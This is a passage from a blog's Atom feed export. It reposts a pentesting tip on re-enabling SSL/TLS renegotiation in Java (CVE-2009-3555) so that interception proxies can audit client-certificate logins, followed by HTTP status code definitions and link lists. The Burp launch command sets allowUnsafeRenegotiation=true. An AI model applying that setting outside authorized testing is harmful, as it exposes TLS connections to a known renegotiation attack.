updated the Java version of your pentesting system (You did, didn't you?), you must be aware that your interception proxies won't be able to audit web applications that make use of client X.509 certificates for authentication. This specifically affects pentests on e-government and e-banking web applications making use of client certificates, such as those stored on smart cards (like some European national identity cards); in particular for Spain, dozens of websites integrate authentication through the electronic national id card, "DNI electronico" (DNIe). &lt;br /&gt;&lt;br /&gt;The reason is that Java 6 Update 19 includes a fix for the famous SSL/TLS renegotiation vulnerability from November 2009 (CVE-2009-3555). The SSL/TLS renegotiation feature is specifically used by certificate-based client authentication, and the fix disables SSL/TLS renegotiation in the Java Secure Sockets Extension (JSSE) by default. As a result, when you try to access a web resource that requires certificate-based client authentication through the interception proxy, it generates the following Java SSL/TLS error message (javax.net.ssl.SSLException): "HelloRequest followed by an unexpected  handshake message".&lt;br /&gt;&lt;br /&gt;Webscarab error message:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Burp error message:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;However, it is still possible to re-enable the SSL/TLS renegotiation in Java by setting the new system property sun.security.ssl.allowUnsafeRenegotiation to true before the JSSE library is initialized. The following Windows command line launches Burp with SSL/TLS renegotiation enabled:&lt;br /&gt;&lt;br /&gt;C:\&gt;java -jar -Xmx512m -Dsun.security.ssl.allowUnsafeRenegotiation=true "C:\Program Files\burpsuite_pro_v1.3\burpsuite_pro_v1.3.jar" &lt;br /&gt;&lt;br /&gt;Keep your WebApp PenTests rolling!&lt;br /&gt;&lt;br /&gt;Shameless plug: Interested on learning the art of WebApp PenTesting? I will be teaching SANS SEC542, "Web Application Penetration Testing and Ethical Hacking", in London (May 10-15, 2010) in English and in Madrid (September 20-25, 2010) in Spanish.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-6835438685092562573?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://blog.taddong.com/2010/04/certificate-based-client-authentication.html' title='Certificate-based Client Authentication in WebApp PenTests'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/6835438685092562573/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=6835438685092562573&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/6835438685092562573'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/6835438685092562573'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/certificate-based-client-authentication.html' title='Certificate-based Client Authentication in WebApp PenTests'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-7428944316188523308</id><published>2010-07-26T05:49:00.000-07:00</published><updated>2010-07-26T05:53:07.393-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP source code auditing'/><title type='text'>Additional notes in PHP source code auditing</title><content type='html'>http://www.abysssec.com/blog/category/fuzzing/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;20 ways to php Source code fuzzing (Auditing)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-7428944316188523308?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.abysssec.com/blog/category/fuzzing/' title='Additional notes in PHP source code auditing'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/7428944316188523308/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=7428944316188523308&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/7428944316188523308'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/7428944316188523308'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/additional-notes-in-php-source-code.html' title='Additional notes in PHP source code auditing'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-2239693068054428352</id><published>2010-07-12T21:16:00.000-07:00</published><updated>2010-07-12T21:17:48.487-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HTTP Status Codes'/><title type='text'>HTTP Status Codes</title><content type='html'>Informational 1xx &lt;br /&gt;&lt;br /&gt;100  Continue  &lt;br /&gt;The client SHOULD continue with its request. This interim response is used to inform the client that the initial part of the request has been received and has not yet been rejected by the server. The client SHOULD continue by sending the remainder of the request or, if the request has already been completed, ignore this response. The server MUST send a final response after the request has been completed. See section 8.2.3 for detailed discussion of the use and handling of this status code. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;101 Switching Protocols &lt;br /&gt;The server understands and is willing to comply with the client's request, via the Upgrade message header field (section 14.42), for a change in the application protocol being used on this connection. The server will switch protocols to those defined by the response's Upgrade header field immediately after the empty line which terminates the 101 response. &lt;br /&gt;&lt;br /&gt;The protocol SHOULD be switched only when it is advantageous to do so. For example, switching to a newer version of HTTP is advantageous over older versions, and switching to a real-time, synchronous protocol might be advantageous when delivering resources that use such features. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt; Successful 2xx &lt;br /&gt;&lt;br /&gt;200  OK &lt;br /&gt;The request has succeeded. The information returned with the response is dependent on the method used in the request, for example: &lt;br /&gt;&lt;br /&gt;GET an entity corresponding to the requested resource is sent in the response; &lt;br /&gt;&lt;br /&gt;HEAD the entity-header fields corresponding to the requested resource are sent in the response without any message-body; &lt;br /&gt;&lt;br /&gt;POST an entity describing or containing the result of the action; &lt;br /&gt;&lt;br /&gt;TRACE an entity containing the request message as received by the end server. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;201 Created &lt;br /&gt;The request has been fulfilled and resulted in a new resource being created. The newly created resource can be referenced by the URI(s) returned in the entity of the response, with the most specific URI for the resource given by a Location header field. The response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. The origin server MUST create the resource before returning the 201 status code. If the action cannot be carried out immediately, the server SHOULD respond with 202 (Accepted) response instead. &lt;br /&gt;&lt;br /&gt;A 201 response MAY contain an ETag response header field indicating the current value of the entity tag for the requested variant just created, see section 14.19 . &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;202 Accepted &lt;br /&gt;The request has been accepted for processing, but the processing has not been completed. The request might or might not eventually be acted upon, as it might be disallowed when processing actually takes place. There is no facility for re-sending a status code from an asynchronous operation such as this. &lt;br /&gt;&lt;br /&gt;The 202 response is intentionally non-committal. Its purpose is to allow a server to accept a request for some other process (perhaps a batch-oriented process that is only run once per day) without requiring that the user agent's connection to the server persist until the process is completed. The entity returned with this response SHOULD include an indication of the request's current status and either a pointer to a status monitor or some estimate of when the user can expect the request to be fulfilled. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;203 Non-Authoritative Information &lt;br /&gt;The returned metainformation in the entity-header is not the definitive set as available from the origin server, but is gathered from a local or a third-party copy. The set presented MAY be a subset or superset of the original version. For example, including local annotation information about the resource might result in a superset of the metainformation known by the origin server. Use of this response code is not required and is only appropriate when the response would otherwise be 200 (OK). &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;204 No Content &lt;br /&gt;The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant. &lt;br /&gt;&lt;br /&gt;If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view. &lt;br /&gt;&lt;br /&gt;The 204 response MUST NOT include a message-body, and thus is always terminated by the first empty line after the header fields. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;205 Reset Content &lt;br /&gt;The server has fulfilled the request and the user agent SHOULD reset the document view which caused the request to be sent. This response is primarily intended to allow input for actions to take place via user input, followed by a clearing of the form in which the input is given so that the user can easily initiate another input action. The response MUST NOT include an entity. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;206 Partial Content &lt;br /&gt;The server has fulfilled the partial GET request for the resource. The request MUST have included a Range header field (section 14.35) indicating the desired range, and MAY have included an If-Range header field (section 14.27 ) to make the request conditional. &lt;br /&gt;&lt;br /&gt;The response MUST include the following header fields: &lt;br /&gt;&lt;br /&gt;- Either a Content-Range header field (section 14.16) indicating the range included with this response, or a multipart/byteranges Content-Type including Content-Range fields for each part. If a Content-Length header field is present in the response, its value MUST match the actual number of OCTETs transmitted in the message-body. - Date - ETag and/or Content-Location, if the header would have been sent in a 200 response to the same request - Expires, Cache-Control, and/or Vary, if the field-value might differ from that sent in any previous response for the same variant &lt;br /&gt;If the 206 response is the result of an If-Range request that used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. If the response is the result of an If-Range request that used a weak validator, the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers. Otherwise, the response MUST include all of the entity-headers that would have been returned with a 200 (OK) response to the same request. &lt;br /&gt;&lt;br /&gt;A cache MUST NOT combine a 206 response with other previously cached content if the ETag or Last-Modified headers do not match exactly, see 13.5.4 . &lt;br /&gt;&lt;br /&gt;A cache that does not support the Range and Content-Range headers MUST NOT cache 206 (Partial) responses. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt; Redirection 3xx &lt;br /&gt;&lt;br /&gt;300  Multiple Choices &lt;br /&gt;The requested resource corresponds to any one of a set of representations, each with its own specific location, and agent- driven negotiation information (section 12) is being provided so that the user (or user agent) can select a preferred representation and redirect its request to that location. &lt;br /&gt;&lt;br /&gt;Unless it was a HEAD request, the response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content- Type header field. Depending upon the format and the capabilities of &lt;br /&gt;&lt;br /&gt;the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection. &lt;br /&gt;&lt;br /&gt;If the server has a preferred choice of representation, it SHOULD include the specific URI for that representation in the Location field; user agents MAY use the Location field value for automatic redirection. This response is cacheable unless indicated otherwise. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;301 Moved Permanently &lt;br /&gt;The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs. Clients with link editing capabilities ought to automatically re-link references to the Request-URI to one or more of the new references returned by the server, where possible. This response is cacheable unless indicated otherwise. &lt;br /&gt;&lt;br /&gt;The new permanent URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s). &lt;br /&gt;&lt;br /&gt;If the 301 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued. &lt;br /&gt;&lt;br /&gt;Note: When automatically redirecting a POST request after receiving a 301 status code, some existing HTTP/1.0 user agents will erroneously change it into a GET request. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;302 Found  &lt;br /&gt;The requested resource resides temporarily under a different URI. Since the redirection might be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field. &lt;br /&gt;&lt;br /&gt;The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s). &lt;br /&gt;&lt;br /&gt;If the 302 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued. &lt;br /&gt;&lt;br /&gt;Note: RFC 1945 and RFC 2068 specify that the client is not allowed to change the method on the redirected request. However, most existing user agent implementations treat 302 as if it were a 303 response, performing a GET on the Location field-value regardless of the original request method. The status codes 303 and 307 have been added for servers that wish to make unambiguously clear which kind of reaction is expected of the client.  &lt;br /&gt;&lt;br /&gt;303 See Other  &lt;br /&gt;The response to the request can be found under a different URI and SHOULD be retrieved using a GET method on that resource. This method exists primarily to allow the output of a POST-activated script to redirect the user agent to a selected resource. The new URI is not a substitute reference for the originally requested resource. The 303 response MUST NOT be cached, but the response to the second (redirected) request might be cacheable. &lt;br /&gt;&lt;br /&gt;The different URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s). &lt;br /&gt;&lt;br /&gt;Note: Many pre-HTTP/1.1 user agents do not understand the 303 status. When interoperability with such clients is a concern, the 302 status code may be used instead, since most user agents react to a 302 response as described here for 303.  &lt;br /&gt;&lt;br /&gt;304 Not Modified &lt;br /&gt;If the client has performed a conditional GET request and access is allowed, but the document has not been modified, the server SHOULD respond with this status code. The 304 response MUST NOT contain a message-body, and thus is always terminated by the first empty line after the header fields. &lt;br /&gt;&lt;br /&gt;The response MUST include the following header fields: &lt;br /&gt;&lt;br /&gt;- Date, unless its omission is required by section 14.18.1 &lt;br /&gt;If a clockless origin server obeys these rules, and proxies and clients add their own Date to any response received without one (as already specified by [RFC 2068], section 14.19 ), caches will operate correctly. &lt;br /&gt;&lt;br /&gt;- ETag and/or Content-Location, if the header would have been sent in a 200 response to the same request - Expires, Cache-Control, and/or Vary, if the field-value might differ from that sent in any previous response for the same variant &lt;br /&gt;If the conditional GET used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. Otherwise (i.e., the conditional GET used a weak validator), the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers. &lt;br /&gt;&lt;br /&gt;If a 304 response indicates an entity not currently cached, then the cache MUST disregard the response and repeat the request without the conditional. &lt;br /&gt;&lt;br /&gt;If a cache uses a received 304 response to update a cache entry, the cache MUST update the entry to reflect any new field values given in the response. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;305 Use Proxy &lt;br /&gt;The requested resource MUST be accessed through the proxy given by the Location field. The Location field gives the URI of the proxy. The recipient is expected to repeat this single request via the proxy. 305 responses MUST only be generated by origin servers. &lt;br /&gt;&lt;br /&gt;Note: RFC 2068 was not clear that 305 was intended to redirect a single request, and to be generated by origin servers only. Not observing these limitations has significant security consequences.  &lt;br /&gt;&lt;br /&gt;306 (Unused) &lt;br /&gt;The 306 status code was used in a previous version of the specification, is no longer used, and the code is reserved. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;307 Temporary Redirect &lt;br /&gt;The requested resource resides temporarily under a different URI. Since the redirection MAY be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field. &lt;br /&gt;&lt;br /&gt;The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s) , since many pre-HTTP/1.1 user agents do not understand the 307 status. Therefore, the note SHOULD contain the information necessary for a user to repeat the original request on the new URI. &lt;br /&gt;&lt;br /&gt;If the 307 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt; Client Error 4xx &lt;br /&gt;&lt;br /&gt;400  Bad Request &lt;br /&gt;The request could not be understood by the server due to malformed syntax. The client SHOULD NOT repeat the request without modifications. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;401 Unauthorized &lt;br /&gt;The request requires user authentication. The response MUST include a WWW-Authenticate header field (section 14.47) containing a challenge applicable to the requested resource. The client MAY repeat the request with a suitable Authorization header field (section 14.8 ). If the request already included Authorization credentials, then the 401 response indicates that authorization has been refused for those credentials. If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user SHOULD be presented the entity that was given in the response, since that entity might include relevant diagnostic information. HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43] . &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;402 Payment Required &lt;br /&gt;This code is reserved for future use. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;403 Forbidden  &lt;br /&gt;The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;404 Not Found &lt;br /&gt;The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;405 Method Not Allowed &lt;br /&gt;The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;406 (Unused) &lt;br /&gt;The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request. &lt;br /&gt;&lt;br /&gt;Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection. &lt;br /&gt;&lt;br /&gt;Note: HTTP/1.1 servers are allowed to return responses which are not acceptable according to the accept headers sent in the request. In some cases, this may even be preferable to sending a 406 response. User agents are encouraged to inspect the headers of an incoming response to determine if it is acceptable. &lt;br /&gt;If the response could be unacceptable, a user agent SHOULD temporarily stop receipt of more data and query the user for a decision on further actions. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;407 Proxy Authentication Required &lt;br /&gt;This code is similar to 401 (Unauthorized), but indicates that the client must first authenticate itself with the proxy. The proxy MUST return a Proxy-Authenticate header field (section 14.33 ) containing a challenge applicable to the proxy for the requested resource. The client MAY repeat the request with a suitable Proxy-Authorization header field (section 14.34 ). HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43] . &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;408 Request Timeout &lt;br /&gt;The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;409 Conflict &lt;br /&gt;The request could not be completed due to a conflict with the current state of the resource. This code is only allowed in situations where it is expected that the user might be able to resolve the conflict and resubmit the request. The response body SHOULD include enough &lt;br /&gt;&lt;br /&gt;information for the user to recognize the source of the conflict. Ideally, the response entity would include enough information for the user or user agent to fix the problem; however, that might not be possible and is not required. &lt;br /&gt;&lt;br /&gt;Conflicts are most likely to occur in response to a PUT request. For example, if versioning were being used and the entity being PUT included changes to a resource which conflict with those made by an earlier (third-party) request, the server might use the 409 response to indicate that it can't complete the request. In this case, the response entity would likely contain a list of the differences between the two versions in a format defined by the response Content-Type. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;410 Gone  &lt;br /&gt;The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 (Not Found) SHOULD be used instead. This response is cacheable unless indicated otherwise. &lt;br /&gt;&lt;br /&gt;The 410 response is primarily intended to assist the task of web maintenance by notifying the recipient that the resource is intentionally unavailable and that the server owners desire that remote links to that resource be removed. Such an event is common for limited-time, promotional services and for resources belonging to individuals no longer working at the server's site. It is not necessary to mark all permanently unavailable resources as "gone" or to keep the mark for any length of time -- that is left to the discretion of the server owner. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;411 Length Required &lt;br /&gt;The server refuses to accept the request without a defined Content- Length. The client MAY repeat the request if it adds a valid Content-Length header field containing the length of the message-body in the request message. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;412 Precondition Failed &lt;br /&gt;The precondition given in one or more of the request-header fields evaluated to false when it was tested on the server. This response code allows the client to place preconditions on the current resource metainformation (header field data) and thus prevent the requested method from being applied to a resource other than the one intended. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;413 Request Entity Too Large &lt;br /&gt;The server is refusing to process a request because the request entity is larger than the server is willing or able to process. The server MAY close the connection to prevent the client from continuing the request. &lt;br /&gt;&lt;br /&gt;If the condition is temporary, the server SHOULD include a Retry- After header field to indicate that it is temporary and after what time the client MAY try again. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;414 Request-URI Too Long &lt;br /&gt;The server is refusing to service the request because the Request-URI is longer than the server is willing to interpret. This rare condition is only likely to occur when a client has improperly converted a POST request to a GET request with long query information, when the client has descended into a URI "black hole" of redirection (e.g., a redirected URI prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit security holes present in some servers using fixed-length buffers for reading or manipulating the Request-URI. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;415 Unsupported Media Type &lt;br /&gt;The server is refusing to service the request because the entity of the request is in a format not supported by the requested resource for the requested method. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;416 Requested Range Not Satisfiable &lt;br /&gt;A server SHOULD return a response with this status code if a request included a Range request-header field (section 14.35), and none of the range-specifier values in this field overlap the current extent of the selected resource, and the request did not include an If-Range request-header field. (For byte-ranges, this means that the first- byte-pos of all of the byte-range-spec values were greater than the current length of the selected resource.) &lt;br /&gt;&lt;br /&gt;When this status code is returned for a byte-range request, the response SHOULD include a Content-Range entity-header field specifying the current length of the selected resource (see section 14.16 ). This response MUST NOT use the multipart/byteranges content- type. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;417 Expectation Failed &lt;br /&gt;The expectation given in an Expect request-header field (see section 14.20) could not be met by this server, or, if the server is a proxy, the server has unambiguous evidence that the request could not be met by the next-hop server. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt; Server Error 5xx &lt;br /&gt;&lt;br /&gt;500 Internal Server Error &lt;br /&gt;The server encountered an unexpected condition which prevented it from fulfilling the request. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;501 Not Implemented &lt;br /&gt;The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource. &lt;br /&gt; &lt;br /&gt;&lt;br /&gt;502 Bad Gateway &lt;br /&gt;The server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-2239693068054428352?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/2239693068054428352/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=2239693068054428352&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/2239693068054428352'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/2239693068054428352'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/07/http-status-codes.html' title='HTTP Status Codes'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-5196848306222854753</id><published>2010-04-29T04:45:00.001-07:00</published><updated>2010-04-29T04:47:58.019-07:00</updated><title type='text'>Test website speed tools and method</title><content type='html'>&lt;iframe src="http://external.pingdom.com/htmlbanners/tools250x140/" name="pingdomtools" width="250" height="140" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;br /&gt;&lt;h1 style="font: 14px Arial, Helvetica, sans-serif"&gt;Pingdom - The Uptime Company&lt;/h1&gt;&lt;br /&gt;&lt;p style="font: 11px Arial, Helvetica, sans-serif"&gt;Visit &lt;a href="http://tools.pingdom.com/"&gt;Pingdom Tools&lt;/a&gt; and test your website.&lt;/p&gt;&lt;br /&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;strong&gt;Is your website down?&lt;/strong&gt;&lt;br /&gt;Monitor the uptime and response time of your website or server. Receive alerts via email or SMS in case of any error. Free trial including 20 sms. &lt;a href="http://www.pingdom.com"&gt;Pingdom — The Uptime Company&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-5196848306222854753?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/5196848306222854753/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=5196848306222854753&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/5196848306222854753'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/5196848306222854753'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/04/test-website-speed-tools-and-method.html' title='Test website speed tools and method'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-2093561440240203155</id><published>2010-04-17T10:08:00.000-07:00</published><updated>2010-04-17T10:10:23.827-07:00</updated><title type='text'>Ten Steps to International Business Intelligence</title><content type='html'>Step 1) Keep Current in International Business&lt;br /&gt;&lt;a href="http://www.economist.com/corporate/corporate_action.cfm?id=93-AHPT-EVLI-AXWM-GRAW&amp;amp;sa_campaign=bulk/eiu/universityofflorida/blank"&gt;Economist.com&lt;/a&gt; &amp;amp; &lt;a href="http://www.viewswire.com/"&gt;EIU Viewswire&lt;/a&gt; open incomparable windows on the world of international business, offering timely briefings on business issues worldwide as well as country intelligence for over 190 countries. They are Web-based services from the Economist Intelligence Unit and the &lt;a href="http://www.economist.com/corporate/corporate_action.cfm?id=93-AHPT-EVLI-AXWM-GRAW&amp;amp;sa_campaign=bulk/eiu/universityofflorida/blank"&gt;Economist&lt;/a&gt; magazine. &lt;a href="http://global.factiva.com/en/sess/login.asp?xsid=S003WvfZcnyMTZyMTAoOT6vNpEqMtmm5DFHY96oYqZlNFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"&gt;Factiva&lt;/a&gt;, combines Dow Jones &amp;amp; Reuter's content. It features a searchable publications library with the full-text of The Wall Street Journal, The Wall Street Journal Europe, The Asian Wall Street Journal, The Economist, Business Week, Reuters, and thousands of other newspapers, magazines, news services and journals worldwide. &lt;a href="http://www.lexisnexis.com/us/lnacademic"&gt;Lexis-Nexis&lt;/a&gt; also has the full-text of thousands of sources covering international business issues including the Financial Times. &lt;a href="http://businesslibrary.uflib.ufl.edu/undefined"&gt;ABI/INFORM&lt;/a&gt;and &lt;a href="http://search.ebscohost.com/?authtype=ip,uid&amp;amp;profile=bsi"&gt;Business Source Premier&lt;/a&gt; index, abstract and provide selected full-text of thousands of English language business and economics journals. Use the &lt;a href="http://web.uflib.ufl.edu/cm/business/articles.htm"&gt;Articles Guide&lt;/a&gt; guide to identify additional databases for full-text articles. The Financial Times’ portal, &lt;a href="http://www.ft.com/"&gt;ft.com&lt;/a&gt;, reports current news from a European perspective.&lt;br /&gt;2)  Find In-Depth Country Intelligence&lt;br /&gt;&lt;a href="http://www.eiu.com/"&gt;EIU.com&lt;/a&gt; provides more than 200 in-depth Country Profiles and Country Reports for the major economic and strategic powers including the U.S., Canada, the UK, Germany, France, Italy, Spain, Australia, Japan, Russia, China, Hong Kong, and India, as well as Latin America, the Caribbean, Asia,  Africa, the Middle East, and Israel. &lt;a href="http://www.viewswire.com/"&gt;EIU Viewswire&lt;/a&gt; covers all of the countries with convenient Country home pages that organize EIU's news and analysis into sections on the country's politics, economy, finance, business and regulations. &lt;a title="MarketLine" href="http://www.marketlineinfo.com/library/" target="_blank"&gt;MarketLine&lt;/a&gt; features Country Analysis Reports using the PESTLE framework. Each profile analyzes the political, economic, social, technological, legal and environmental structure of the country. Each of the PESTLE factors is explored on four parameters: current strengths, current challenges, future prospects and future risks. You can supplement these reports with the U.S. Department of State's &lt;a href="http://www.state.gov/www/background_notes/"&gt;Background Notes&lt;/a&gt; and Country Commercial Guides (easily retrieved via &lt;a href="http://globaledge.msu.edu/"&gt;globalEDGE&lt;/a&gt;). &lt;a href="http://globaledge.msu.edu/"&gt;globalEDGE&lt;/a&gt; features Country Insights reference pages that link to key sources for each country. &lt;a 